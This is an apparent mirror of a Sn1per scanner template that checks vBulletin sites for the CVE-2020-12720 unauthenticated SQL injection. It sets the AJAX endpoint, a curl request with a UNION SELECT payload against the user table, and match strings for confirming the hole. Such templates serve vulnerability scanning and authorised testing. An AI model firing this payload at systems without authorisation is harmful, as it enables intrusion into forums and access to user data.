Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
1N3
GitHub Repository: 1N3/Sn1per
 Path: blob/master/templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_1.sh
2969 views
1
AUTHOR='@xer0dayz'

2
VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 1'

3
URI="/ajax/api/content_infraction/getIndexableContent"

4
METHOD='POST'

5
MATCH="6162636D31|database\ error"

6
SEVERITY='P1 - CRITICAL'

7
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,HEX('abcm1'),8,7,6,5,4,3,2,1+from+user+where+userid=1--\" "

8
SECONDARY_COMMANDS=''

9
GREP_OPTIONS='-i'

10